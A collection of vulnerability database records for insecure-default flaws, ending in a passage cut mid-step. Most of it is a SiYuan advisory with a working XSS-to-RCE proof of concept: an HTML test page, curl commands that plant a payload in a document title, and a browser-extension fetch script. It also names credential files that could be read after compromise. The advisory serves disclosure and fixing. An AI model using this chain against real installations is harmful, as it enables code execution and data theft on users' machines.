"value": "After initial configuration, the Ruggedcom Discovery Protocol (RCDP) is still able to write to the device under certain conditions.\r\n\r\nThis could allow an attacker located in the adjacent network of the targeted device to perform unauthorized administrative actions."
}
],
"metrics": [
{
"cvssV3_1": {
"baseScore": 8.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-1188",
"description": "CWE-1188: Initialization of a Resource with an Insecure Default",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-08-12T11:10:44.721Z",
"orgId": "cec7a2ec-15b4-4faf-bd53-b40f371f3a77",
"shortName": "siemens"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://www.siemens.com/cert/pool/cert/siemens_security_advisory_ssa-856721.pdf"
},
{
"name": "1039463",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK"
],
"url": "http://www.securitytracker.com/id/1039463"
},
{
"name": "1039464",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK"
],
"url": "http://www.securitytracker.com/id/1039464"
},
{
"name": "101041",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/101041"
},
{
"url": "https://cert-portal.siemens.com/productcert/html/ssa-856721.html"
}
]
}
},
"cveMetadata": {
"assignerOrgId": "cec7a2ec-15b4-4faf-bd53-b40f371f3a77",
"assignerShortName": "siemens",
"cveId": "CVE-2017-12736",
"datePublished": "2017-12-26T04:00:00.000Z",
"dateReserved": "2017-08-09T00:00:00.000Z",
"dateUpdated": "2025-08-12T11:10:44.721Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
GHSA-225Q-FGFG-49QP
Vulnerability from github – Published: 2025-04-08 12:30 – Updated: 2025-04-08 12:30Dell Common Event Enabler, version(s) CEE 9.0.0.0, contain(s) an Initialization of a Resource with an Insecure Default vulnerability in the Common Anti-Virus Agent (CAVA). An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to Unauthorized access.
{
"affected": [],
"aliases": [
"CVE-2025-29985"
],
"database_specific": {
"cwe_ids": [
"CWE-1188"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-04-08T11:15:42Z",
"severity": "MODERATE"
},
"details": "Dell Common Event Enabler, version(s) CEE 9.0.0.0, contain(s) an Initialization of a Resource with an Insecure Default vulnerability in the Common Anti-Virus Agent (CAVA). An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to Unauthorized access.",
"id": "GHSA-225q-fgfg-49qp",
"modified": "2025-04-08T12:30:34Z",
"published": "2025-04-08T12:30:34Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-29985"
},
{
"type": "WEB",
"url": "https://www.dell.com/support/kbdoc/en-us/000303931/dsa-2025-158-security-update-for-dell-common-event-enabler-vulnerabilities"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-25JF-QR89-V245
Vulnerability from github – Published: 2026-07-14 00:31 – Updated: 2026-07-14 00:31Argo CD Helm Chart before 10.0.0 fails to install network policies by default, allowing any pod on a cluster to access repo-server and other Argo APIs. Attackers can exploit this unrestricted network access through combined attacks to achieve cluster compromise and remote code execution.
{
"affected": [],
"aliases": [
"CVE-2026-62185"
],
"database_specific": {
"cwe_ids": [
"CWE-1188"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-07-13T22:16:49Z",
"severity": "HIGH"
},
"details": "Argo CD Helm Chart before 10.0.0 fails to install network policies by default, allowing any pod on a cluster to access repo-server and other Argo APIs. Attackers can exploit this unrestricted network access through combined attacks to achieve cluster compromise and remote code execution.",
"id": "GHSA-25jf-qr89-v245",
"modified": "2026-07-14T00:31:03Z",
"published": "2026-07-14T00:31:03Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/argoproj/argo-helm/security/advisories/GHSA-47m3-95c7-g2g8"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-62185"
},
{
"type": "WEB",
"url": "https://www.vulncheck.com/advisories/argo-cd-helm-chart-missing-network-policy-rce"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-25M3-W28P-V3V3
Vulnerability from github – Published: 2025-09-16 00:30 – Updated: 2025-09-16 19:15In Liferay Portal 7.1.0 through 7.4.3.111, and Liferay DXP 2023.Q4.0, 2023.Q3.1 through 2023.Q3.4, 7.4 GA through update 92, 7.3 GA through update 35, and older unsupported versions, the default membership type of a newly created site is “Open” which allows any registered users to become a member of the site. A remote attacker with site membership can potentially view, add or edit content on the site.
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "com.liferay:com.liferay.site.admin.web"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "5.0.111"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-43797"
],
"database_specific": {
"cwe_ids": [
"CWE-1188"
],
"github_reviewed": true,
"github_reviewed_at": "2025-09-16T19:15:45Z",
"nvd_published_at": "2025-09-15T22:15:33Z",
"severity": "MODERATE"
},
"details": "In Liferay Portal 7.1.0 through 7.4.3.111, and Liferay DXP 2023.Q4.0, 2023.Q3.1 through 2023.Q3.4, 7.4 GA through update 92, 7.3 GA through update 35, and older unsupported versions, the default membership type of a newly created site is \u201cOpen\u201d which allows any registered users to become a member of the site. A remote attacker with site membership can potentially view, add or edit content on the site.",
"id": "GHSA-25m3-w28p-v3v3",
"modified": "2025-09-16T19:15:45Z",
"published": "2025-09-16T00:30:21Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-43797"
},
{
"type": "PACKAGE",
"url": "https://github.com/liferay/liferay-portal"
},
{
"type": "WEB",
"url": "https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/CVE-2025-43797"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Liferay has Insecure Default Initialization of Resource issue"
}
GHSA-25RP-H46X-2HJM
Vulnerability from github – Published: 2026-05-08 19:08 – Updated: 2026-06-08 20:11Summary
The tooltip mouseover handler in app/src/block/popover.ts reads aria-label via getAttribute and passes it through decodeURIComponent before assigning to messageElement.innerHTML in app/src/dialog/tooltip.ts:41. The encoder used at the producer side, escapeAriaLabel in app/src/util/escape.ts:19-25, only handles HTML special characters (", ', <, literal <) — it leaves %XX URL-escapes untouched. So a doc title containing %3Cimg src=x onerror=...%3E round-trips through escapeAriaLabel and the HTML attribute layer unmodified. Then decodeURIComponent on the consumer side converts %3C to a literal < character (a real <, NOT a character reference). When that string is assigned to innerHTML, the HTML5 tokenizer enters TagOpenState on the literal <, parses the <img> element, and the onerror handler fires.
Because the renderer runs with nodeIntegration: true, contextIsolation: false, webSecurity: false (app/electron/main.js:407-411), require('child_process') is reachable from the injected handler, escalating to arbitrary code execution.
Doc titles, AV column names + descriptions, AV select options, file-tree tooltips all reach this sink because they're rendered into class="ariaLabel" elements with aria-label="${escapeAriaLabel(...)}". Doc title is the easiest plant — any user with create/rename access lands the payload, and the file survives .sy.zip round-trip without modification.
Why a "double HTML-decode" framing is wrong
A naïve reading of the chain might suggest that &lt; (the encoder output) decodes once at attribute-parse time to <, then a second time at innerHTML time to < — yielding a tag. That's incorrect and confirmed false by direct browser testing. Per the HTML5 spec, character references in DataState produce CHARACTER tokens (text), not TagOpenState transitions: the < resulting from a < reference is text data, never a tag-open delimiter. So the HTML-entity-only payload renders as visible literal text, not as a tag.
The actual bypass relies on decodeURIComponent producing a literal < (not a character reference) before innerHTML parses it. Literal < characters in the input stream DO trigger TagOpenState. URL encoding is the right vehicle because the encoder ignores %XX while the consumer chain decodes it.
Details
Encoder. app/src/util/escape.ts:19-25:
export const escapeAriaLabel = (html: string) => {
if (!html) { return html; }
return html.replace(/"/g, """).replace(/'/g, "'")
.replace(/</g, "&lt;").replace(/</g, "&lt;");
};
The four replacements only cover HTML special chars. %XX URL escapes are not touched.
Source — search-result rendering. app/src/search/util.ts:1406:
<span class="b3-list-item__text ariaLabel" ... aria-label="${escapeAriaLabel(title)}">${escapeGreat(title)}</span>
Same pattern at :1448, protyle/render/av/blockAttr.ts:205, protyle/render/av/col.ts:134, protyle/render/av/select.ts:36, search/unRef.ts:113. The title is built from getNotebookName(item.box) + getDisplayName(item.hPath, false) (line 1398). The hPath returned by /api/search/fullTextSearchBlock carries the user-set doc title verbatim — %XX URL-escapes pass through, only HTML special chars are entity-encoded by the kernel.
Consumer. app/src/block/popover.ts:33,144:
let tip = aElement.getAttribute("aria-label") || ""; // literal stored attribute value
// ... branch logic that doesn't apply to plain search results ...
showTooltip(decodeURIComponent(tip), aElement, ...); // ← decodes %XX into raw chars
decodeURIComponent is presumably present to handle URL-encoded asset paths in some hyperlink tooltips, but it's applied unconditionally to every aria-label-sourced tip — that's what enables this bypass.
Sink. app/src/dialog/tooltip.ts:41:
messageElement.innerHTML = message; // ← HTML parser sees the now-decoded raw `<` and starts parsing tags
Decode-chain trace for in-memory title %3Cimg src=x onerror="alert('SiYuan')"%3E (URL-encoded < > ', literal "):
| step | result |
|---|---|
| in-memory title | %3Cimg src=x onerror="alert('SiYuan')"%3E |
escapeAriaLabel writes (only " and ' get encoded — neither appears here as raw chars when ' is %27) |
%3Cimg src=x onerror="alert(%27SiYuan%27)"%3E |
HTML attribute set: aria-label="..." ; browser one-decodes named entities when storing |
in-DOM value = %3Cimg src=x onerror="alert(%27SiYuan%27)"%3E |
getAttribute("aria-label") |
%3Cimg src=x onerror="alert(%27SiYuan%27)"%3E (verbatim) |
decodeURIComponent(tip) |
<img src=x onerror="alert('SiYuan')"> (real < ' > chars) |
messageElement.innerHTML = … |
HTML parser tokenizes raw <img>, creates element, fails to load src=x, fires onerror → JS runs |
Renderer + reachability. Renderer posture and auto-admin gates same as the AV-name advisory (Advisory 1): nodeIntegration:true, contextIsolation:false, webSecurity:false at app/electron/main.js:407-411; empty-AccessAuthCode local auto-admin at kernel/model/session.go:261-287; chrome-extension:// Origin allowlist at session.go:277.
Suggested fix
-
Primary —
app/src/dialog/tooltip.ts:41: replacets messageElement.innerHTML = message;withts messageElement.textContent = message;For tooltips that legitimately need markup (memo rendering, hyperlink preview cards), introduce an explicit{html: true}flag onshowTooltip(...)and route the message throughDOMPurify.sanitize(message)before assigning toinnerHTML. -
Drop
decodeURIComponentatpopover.ts:144for the generic aria-label path. Apply it only on the few callers that intentionally pass URL-encoded asset paths (e.g. the local-asset hyperlink preview branch already inside the function), and apply it insidetry/catchwith a clear scope. Aria-label content is not URL-encoded by design; decoding it is a footgun that converts otherwise-safe attributes into pre-parsed HTML. -
Consolidate the four escape helpers in
app/src/util/escape.ts(escapeHtml,escapeAttr,escapeAriaLabel,escapeGreat) into oneLute.EscapeHTMLStr-equivalent that escapes&,<,>,",'. Context-specific encoders without compile-time enforcement keep producing bug-class variants. -
(Defense-in-depth) Switch the main BrowserWindow to
contextIsolation: truewith a preload bridge — caps every future renderer XSS at "DOM only," not RCE.
Reproduction (copy-paste-ready)
Tested on Windows with SiYuan v3.6.5 (kernel + Electron) and Microsoft Edge as the offline parser-validation engine. Linux/macOS users substitute py with python3 and use any modern Chromium-based browser (Edge/Chrome/Brave) for the standalone validation step.
Prereqs
- Install SiYuan v3.6.5 from https://github.com/siyuan-note/siyuan/releases and launch once. Do not set an
AccessAuthCode(default). - Verify the kernel is up:
sh curl -s http://127.0.0.1:6806/api/system/version # → {"code":0,"msg":"","data":"3.6.5"} - Create at least one notebook (the file tree's "+" button) so
lsNotebooksreturns a usable id. Pin variables:sh API=http://127.0.0.1:6806 NOTEBOOK_ID=$(curl -s -X POST $API/api/notebook/lsNotebooks \ -H 'Content-Type: application/json' -d '{}' \ | python -c 'import sys,json; print(json.load(sys.stdin)["data"]["notebooks"][0]["id"])') echo "Using notebook: $NOTEBOOK_ID"
Step A — Browser-only validation of the chain (no SiYuan needed)
This proves the bug class on its own. Save as decode-chain.html, open in any Chromium-based browser:
<!doctype html>
<html><body>
<h2 id="status">Click "Simulate" — if status turns red, the chain works.</h2>
<span id="src" class="ariaLabel"
aria-label="%3Cimg src=x onerror="document.getElementById('status').innerText='RESULT: payload fired — chain works'; document.getElementById('status').style.color='red';"%3E"
hidden></span>
<button onclick="
let tip = document.getElementById('src').getAttribute('aria-label');
console.log('after getAttribute:', JSON.stringify(tip));
try { tip = decodeURIComponent(tip); } catch(e){}
console.log('after decodeURIComponent:', JSON.stringify(tip));
document.getElementById('out').innerHTML = tip;
">Simulate SiYuan tooltip</button>
<div id="out" style="border:2px solid red; padding:1em; min-height:3em; margin-top:1em;"></div>
</body></html>
Click the button. The <h2 id="status"> flips to red with "RESULT: payload fired — chain works", and the <div id="out"> contains a fully-rendered <img> element (not text). Confirms the chain decodes URL-escapes between getAttribute and innerHTML, producing real tag-open characters.
Step B — Plant the payload in SiYuan
DOC_ID=$(curl -s -X POST $API/api/filetree/createDocWithMd \
-H 'Content-Type: application/json' \
-d "{\"notebook\":\"$NOTEBOOK_ID\",\"path\":\"/tooltip-xss-poc-$$\",\"markdown\":\"trigger me — open the search panel, type 'trigger', and hover this result\"}" \
| python -c 'import sys,json; print(json.load(sys.stdin)["data"])')
echo "DOC: $DOC_ID"
curl -s -X POST $API/api/filetree/renameDocByID \
-H 'Content-Type: application/json' \
--data-binary @- <<EOF
{"id":"$DOC_ID","title":"%3Cimg src=x onerror=\"alert('SiYuan tooltip-XSS PoC')\"%3E"}
EOF
Verify the in-memory title round-trips:
curl -s -X POST $API/api/block/getDocInfo \
-H 'Content-Type: application/json' -d "{\"id\":\"$DOC_ID\"}" \
| python -c 'import sys,json; print(json.load(sys.stdin)["data"]["ial"]["title"])'
# Expected:
# %3Cimg src=x onerror="alert('SiYuan tooltip-XSS PoC')"%3E
Step C — Trigger inside SiYuan
In the SiYuan desktop client:
1. Open the search panel (Ctrl+P / ⌘+P).
2. Type trigger.
3. The result list renders the doc with aria-label="${escapeAriaLabel(title)}". The DOM attribute now contains %3Cimg src=x onerror="alert('SiYuan tooltip-XSS PoC')"%3E (URL-escapes survived; " came from escapeAriaLabel and was decoded by the attribute parser to ").
4. Hover the result row. popover.ts:33 reads the attribute, popover.ts:144 calls decodeURIComponent (decoding %3C/%27/%3E to literal </'/>), tooltip.ts:41 writes innerHTML — HTML parser creates a real <img> element, onerror fires.
5. alert('SiYuan tooltip-XSS PoC') pops.
Step D — .sy.zip reproducer for upstream review
For maintainers who want a single-click reproducer:
ZIP_PATH=$(curl -s -X POST $API/api/export/exportSY \
-H 'Content-Type: application/json' -d "{\"id\":\"$DOC_ID\"}" \
| python -c 'import sys,json; print(json.load(sys.stdin)["data"]["zip"])')
# The kernel re-encodes % in the URL, so it's simpler to grab from disk:
SRC=$(ls -1t "$HOME/SiYuanWorkspace/temp/export"/*.sy.zip | head -1)
cp "$SRC" "$HOME/Desktop/tooltip-xss-poc.sy.zip"
Maintainer reproduces by importing via right-click a notebook → Import → SiYuan .sy.zip → searching trigger → hovering the result. The Lute serialization stores the title in the .sy file with %XX preserved literally and " HTML-entity-encoded — the IAL parser decodes the entities on load, leaving the URL escapes intact, which then feeds the decodeURIComponent-based bypass.
Step E — Browser-extension attack vector (the realistic remote path)
A malicious or compromised installed browser extension's content/background script runs with chrome-extension://<id> Origin, allowlisted by session.go:277. The extension can run Step B's curl chain via fetch() without any SiYuan UI interaction beyond keeping the kernel running:
(async () => {
const api = (path, body) => fetch('http://127.0.0.1:6806' + path, {
method: 'POST', headers: {'Content-Type': 'application/json'},
body: JSON.stringify(body)
}).then(r => r.json());
const nb = await api('/api/notebook/lsNotebooks', {});
const id = (await api('/api/filetree/createDocWithMd', {
notebook: nb.data.notebooks[0].id,
path: '/x' + Date.now(),
markdown: 'trigger'
})).data;
await api('/api/filetree/renameDocByID', {
id,
title: `%3Cimg src=x onerror="alert('SiYuan tooltip-XSS PoC')"%3E`
});
})();
A page from https://attacker.com is rejected — IsLocalOrigin only matches localhost/loopback. Realistic remote vectors: browser extensions, localhost-served webpages, shared .sy.zip imports, sync replication from a co-author's compromised device.
Cleanup
DOC_ID=$(curl -s -X POST $API/api/filetree/searchDocs \
-H 'Content-Type: application/json' -d '{"k":"trigger me"}' \
| python -c 'import sys,json; r=json.load(sys.stdin)["data"]; print(r[0]["id"] if r else "")')
[ -n "$DOC_ID" ] && curl -s -X POST $API/api/filetree/removeDocByID \
-H 'Content-Type: application/json' -d "{\"id\":\"$DOC_ID\"}"
Impact
- RCE on the victim's desktop, triggered by hovering a search result (or any other
class="ariaLabel"element rendering attacker-controlled metadata). - Doc titles are the most commonly-shared field — recipients of
.sy.zip, Bazaar templates, and sync peers all import the malicious title automatically; the URL encoding survives every transport. - Same post-RCE consequences as Advisory 1: full filesystem read (incl.
~/.ssh/,~/.aws/credentials, workspaceconf/conf.json), persistence, cloud-account pivot. - Multiple alternative trigger surfaces beyond search results: AV column names + descriptions, AV select-cell options, file-tree tooltips — any element with
class="ariaLabel"andaria-label="${escapeAriaLabel(...)}"reaches the samepopover.ts → tooltip.tschain. - CVE-2026-34585 fix is incomplete. The encoder-side hardening assumed exactly one HTML decode between encoder and DOM. It did not account for
decodeURIComponentbeing applied to the consumer-side attribute value, which converts URL-escapes that the encoder ignored into literal<characters that initiate tag parsing. A consumer-side fix (textContent, orDOMPurify.sanitizeon the rich-text path; and removing the unconditionaldecodeURIComponent) is required.
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/siyuan-note/siyuan/kernel"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "0.0.0-20260421031503-96dfe0bea474"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-44588"
],
"database_specific": {
"cwe_ids": [
"CWE-116",
"CWE-1188",
"CWE-79"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-08T19:08:30Z",
"nvd_published_at": "2026-05-14T19:16:37Z",
"severity": "CRITICAL"
},
"details": "## Summary\n\nThe tooltip mouseover handler in `app/src/block/popover.ts` reads `aria-label` via `getAttribute` and passes it through `decodeURIComponent` before assigning to `messageElement.innerHTML` in `app/src/dialog/tooltip.ts:41`. The encoder used at the producer side, `escapeAriaLabel` in `app/src/util/escape.ts:19-25`, only handles HTML special characters (`\"`, `\u0027`, `\u003c`, literal `\u0026lt;`) \u2014 it leaves `%XX` URL-escapes untouched. So a doc title containing `%3Cimg src=x onerror=...%3E` round-trips through `escapeAriaLabel` and the HTML attribute layer unmodified. Then `decodeURIComponent` on the consumer side converts `%3C` to a literal `\u003c` character (a real `\u003c`, NOT a character reference). When that string is assigned to `innerHTML`, the HTML5 tokenizer enters TagOpenState on the literal `\u003c`, parses the `\u003cimg\u003e` element, and the `onerror` handler fires.\n\nBecause the renderer runs with `nodeIntegration: true, contextIsolation: false, webSecurity: false` (`app/electron/main.js:407-411`), `require(\u0027child_process\u0027)` is reachable from the injected handler, escalating to arbitrary code execution.\n\nDoc titles, AV column names + descriptions, AV select options, file-tree tooltips all reach this sink because they\u0027re rendered into `class=\"ariaLabel\"` elements with `aria-label=\"${escapeAriaLabel(...)}\"`. Doc title is the easiest plant \u2014 any user with create/rename access lands the payload, and the file survives `.sy.zip` round-trip without modification.\n\n## Why a \"double HTML-decode\" framing is wrong\n\nA na\u00efve reading of the chain might suggest that `\u0026amp;lt;` (the encoder output) decodes once at attribute-parse time to `\u0026lt;`, then a second time at `innerHTML` time to `\u003c` \u2014 yielding a tag. **That\u0027s incorrect** and confirmed false by direct browser testing. Per the HTML5 spec, character references in DataState produce CHARACTER tokens (text), not TagOpenState transitions: the `\u003c` resulting from a `\u0026lt;` reference is text data, never a tag-open delimiter. So the HTML-entity-only payload renders as visible literal text, not as a tag.\n\nThe actual bypass relies on `decodeURIComponent` producing a **literal** `\u003c` (not a character reference) before `innerHTML` parses it. Literal `\u003c` characters in the input stream DO trigger TagOpenState. URL encoding is the right vehicle because the encoder ignores `%XX` while the consumer chain decodes it.\n\n## Details\n\n**Encoder.** `app/src/util/escape.ts:19-25`:\n```ts\nexport const escapeAriaLabel = (html: string) =\u003e {\n if (!html) { return html; }\n return html.replace(/\"/g, \"\u0026quot;\").replace(/\u0027/g, \"\u0026apos;\")\n .replace(/\u003c/g, \"\u0026amp;lt;\").replace(/\u0026lt;/g, \"\u0026amp;lt;\");\n};\n```\nThe four replacements only cover HTML special chars. `%XX` URL escapes are not touched.\n\n**Source \u2014 search-result rendering.** `app/src/search/util.ts:1406`:\n```ts\n\u003cspan class=\"b3-list-item__text ariaLabel\" ... aria-label=\"${escapeAriaLabel(title)}\"\u003e${escapeGreat(title)}\u003c/span\u003e\n```\nSame pattern at `:1448`, `protyle/render/av/blockAttr.ts:205`, `protyle/render/av/col.ts:134`, `protyle/render/av/select.ts:36`, `search/unRef.ts:113`. The `title` is built from `getNotebookName(item.box) + getDisplayName(item.hPath, false)` (line 1398). The `hPath` returned by `/api/search/fullTextSearchBlock` carries the user-set doc title verbatim \u2014 `%XX` URL-escapes pass through, only HTML special chars are entity-encoded by the kernel.\n\n**Consumer.** `app/src/block/popover.ts:33,144`:\n```ts\nlet tip = aElement.getAttribute(\"aria-label\") || \"\"; // literal stored attribute value\n// ... branch logic that doesn\u0027t apply to plain search results ...\nshowTooltip(decodeURIComponent(tip), aElement, ...); // \u2190 decodes %XX into raw chars\n```\n`decodeURIComponent` is presumably present to handle URL-encoded asset paths in some hyperlink tooltips, but it\u0027s applied unconditionally to every aria-label-sourced tip \u2014 that\u0027s what enables this bypass.\n\n**Sink.** `app/src/dialog/tooltip.ts:41`:\n```ts\nmessageElement.innerHTML = message; // \u2190 HTML parser sees the now-decoded raw `\u003c` and starts parsing tags\n```\n\n**Decode-chain trace** for in-memory title `%3Cimg src=x onerror=\"alert(\u0027SiYuan\u0027)\"%3E` (URL-encoded `\u003c` `\u003e` `\u0027`, literal `\"`):\n\n| step | result |\n|------|--------|\n| in-memory title | `%3Cimg src=x onerror=\"alert(\u0027SiYuan\u0027)\"%3E` |\n| `escapeAriaLabel` writes (only `\"` and `\u0027` get encoded \u2014 neither appears here as raw chars when `\u0027` is `%27`) | `%3Cimg src=x onerror=\u0026quot;alert(%27SiYuan%27)\u0026quot;%3E` |\n| HTML attribute set: `aria-label=\"...\"` ; browser one-decodes named entities when storing | in-DOM value = `%3Cimg src=x onerror=\"alert(%27SiYuan%27)\"%3E` |\n| `getAttribute(\"aria-label\")` | `%3Cimg src=x onerror=\"alert(%27SiYuan%27)\"%3E` (verbatim) |\n| `decodeURIComponent(tip)` | **`\u003cimg src=x onerror=\"alert(\u0027SiYuan\u0027)\"\u003e`** (real `\u003c` `\u0027` `\u003e` chars) |\n| `messageElement.innerHTML = \u2026` | HTML parser tokenizes raw `\u003cimg\u003e`, creates element, fails to load `src=x`, fires `onerror` \u2192 JS runs |\n\n**Renderer + reachability.** Renderer posture and auto-admin gates same as the AV-name advisory (Advisory 1): `nodeIntegration:true, contextIsolation:false, webSecurity:false` at `app/electron/main.js:407-411`; empty-`AccessAuthCode` local auto-admin at `kernel/model/session.go:261-287`; `chrome-extension://` Origin allowlist at `session.go:277`.\n\n## Suggested fix\n\n1. **Primary \u2014 `app/src/dialog/tooltip.ts:41`**: replace\n ```ts\n messageElement.innerHTML = message;\n ```\n with\n ```ts\n messageElement.textContent = message;\n ```\n For tooltips that legitimately need markup (memo rendering, hyperlink preview cards), introduce an explicit `{html: true}` flag on `showTooltip(...)` and route the message through `DOMPurify.sanitize(message)` before assigning to `innerHTML`.\n\n2. **Drop `decodeURIComponent` at `popover.ts:144`** for the generic aria-label path. Apply it only on the few callers that intentionally pass URL-encoded asset paths (e.g. the local-asset hyperlink preview branch already inside the function), and apply it inside `try`/`catch` with a clear scope. Aria-label content is not URL-encoded by design; decoding it is a footgun that converts otherwise-safe attributes into pre-parsed HTML.\n\n3. **Consolidate the four escape helpers** in `app/src/util/escape.ts` (`escapeHtml`, `escapeAttr`, `escapeAriaLabel`, `escapeGreat`) into one `Lute.EscapeHTMLStr`-equivalent that escapes `\u0026`, `\u003c`, `\u003e`, `\"`, `\u0027`. Context-specific encoders without compile-time enforcement keep producing bug-class variants.\n\n4. **(Defense-in-depth)** Switch the main BrowserWindow to `contextIsolation: true` with a preload bridge \u2014 caps every future renderer XSS at \"DOM only,\" not RCE.\n\n---\n\n## Reproduction (copy-paste-ready)\n\nTested on Windows with SiYuan v3.6.5 (kernel + Electron) and Microsoft Edge as the offline parser-validation engine. Linux/macOS users substitute `py` with `python3` and use any modern Chromium-based browser (Edge/Chrome/Brave) for the standalone validation step.\n\n### Prereqs\n\n1. **Install SiYuan v3.6.5** from https://github.com/siyuan-note/siyuan/releases and launch once. **Do not set an `AccessAuthCode`** (default).\n2. Verify the kernel is up:\n ```sh\n curl -s http://127.0.0.1:6806/api/system/version\n # \u2192 {\"code\":0,\"msg\":\"\",\"data\":\"3.6.5\"}\n ```\n3. Create at least one notebook (the file tree\u0027s \"+\" button) so `lsNotebooks` returns a usable id. Pin variables:\n ```sh\n API=http://127.0.0.1:6806\n NOTEBOOK_ID=$(curl -s -X POST $API/api/notebook/lsNotebooks \\\n -H \u0027Content-Type: application/json\u0027 -d \u0027{}\u0027 \\\n | python -c \u0027import sys,json; print(json.load(sys.stdin)[\"data\"][\"notebooks\"][0][\"id\"])\u0027)\n echo \"Using notebook: $NOTEBOOK_ID\"\n ```\n\n### Step A \u2014 Browser-only validation of the chain (no SiYuan needed)\n\nThis proves the bug class on its own. Save as `decode-chain.html`, open in any Chromium-based browser:\n\n```html\n\u003c!doctype html\u003e\n\u003chtml\u003e\u003cbody\u003e\n\u003ch2 id=\"status\"\u003eClick \"Simulate\" \u2014 if status turns red, the chain works.\u003c/h2\u003e\n\u003cspan id=\"src\" class=\"ariaLabel\"\n aria-label=\"%3Cimg src=x onerror=\u0026quot;document.getElementById(\u0027status\u0027).innerText=\u0027RESULT: payload fired \u2014 chain works\u0027; document.getElementById(\u0027status\u0027).style.color=\u0027red\u0027;\u0026quot;%3E\"\n hidden\u003e\u003c/span\u003e\n\u003cbutton onclick=\"\n let tip = document.getElementById(\u0027src\u0027).getAttribute(\u0027aria-label\u0027);\n console.log(\u0027after getAttribute:\u0027, JSON.stringify(tip));\n try { tip = decodeURIComponent(tip); } catch(e){}\n console.log(\u0027after decodeURIComponent:\u0027, JSON.stringify(tip));\n document.getElementById(\u0027out\u0027).innerHTML = tip;\n\"\u003eSimulate SiYuan tooltip\u003c/button\u003e\n\u003cdiv id=\"out\" style=\"border:2px solid red; padding:1em; min-height:3em; margin-top:1em;\"\u003e\u003c/div\u003e\n\u003c/body\u003e\u003c/html\u003e\n```\n\nClick the button. The `\u003ch2 id=\"status\"\u003e` flips to red with \"RESULT: payload fired \u2014 chain works\", and the `\u003cdiv id=\"out\"\u003e` contains a fully-rendered `\u003cimg\u003e` element (not text). Confirms the chain decodes URL-escapes between `getAttribute` and `innerHTML`, producing real tag-open characters.\n\n### Step B \u2014 Plant the payload in SiYuan\n\n```sh\nDOC_ID=$(curl -s -X POST $API/api/filetree/createDocWithMd \\\n -H \u0027Content-Type: application/json\u0027 \\\n -d \"{\\\"notebook\\\":\\\"$NOTEBOOK_ID\\\",\\\"path\\\":\\\"/tooltip-xss-poc-$$\\\",\\\"markdown\\\":\\\"trigger me \u2014 open the search panel, type \u0027trigger\u0027, and hover this result\\\"}\" \\\n | python -c \u0027import sys,json; print(json.load(sys.stdin)[\"data\"])\u0027)\necho \"DOC: $DOC_ID\"\n\ncurl -s -X POST $API/api/filetree/renameDocByID \\\n -H \u0027Content-Type: application/json\u0027 \\\n --data-binary @- \u003c\u003cEOF\n{\"id\":\"$DOC_ID\",\"title\":\"%3Cimg src=x onerror=\\\"alert(\u0027SiYuan tooltip-XSS PoC\u0027)\\\"%3E\"}\nEOF\n```\nVerify the in-memory title round-trips:\n```sh\ncurl -s -X POST $API/api/block/getDocInfo \\\n -H \u0027Content-Type: application/json\u0027 -d \"{\\\"id\\\":\\\"$DOC_ID\\\"}\" \\\n | python -c \u0027import sys,json; print(json.load(sys.stdin)[\"data\"][\"ial\"][\"title\"])\u0027\n# Expected:\n# %3Cimg src=x onerror=\"alert(\u0027SiYuan tooltip-XSS PoC\u0027)\"%3E\n```\n\n### Step C \u2014 Trigger inside SiYuan\n\nIn the SiYuan desktop client:\n1. Open the search panel (`Ctrl+P` / `\u2318+P`).\n2. Type `trigger`.\n3. The result list renders the doc with `aria-label=\"${escapeAriaLabel(title)}\"`. The DOM attribute now contains `%3Cimg src=x onerror=\"alert(\u0027SiYuan tooltip-XSS PoC\u0027)\"%3E` (URL-escapes survived; `\u0026quot;` came from escapeAriaLabel and was decoded by the attribute parser to `\"`).\n4. **Hover the result row.** `popover.ts:33` 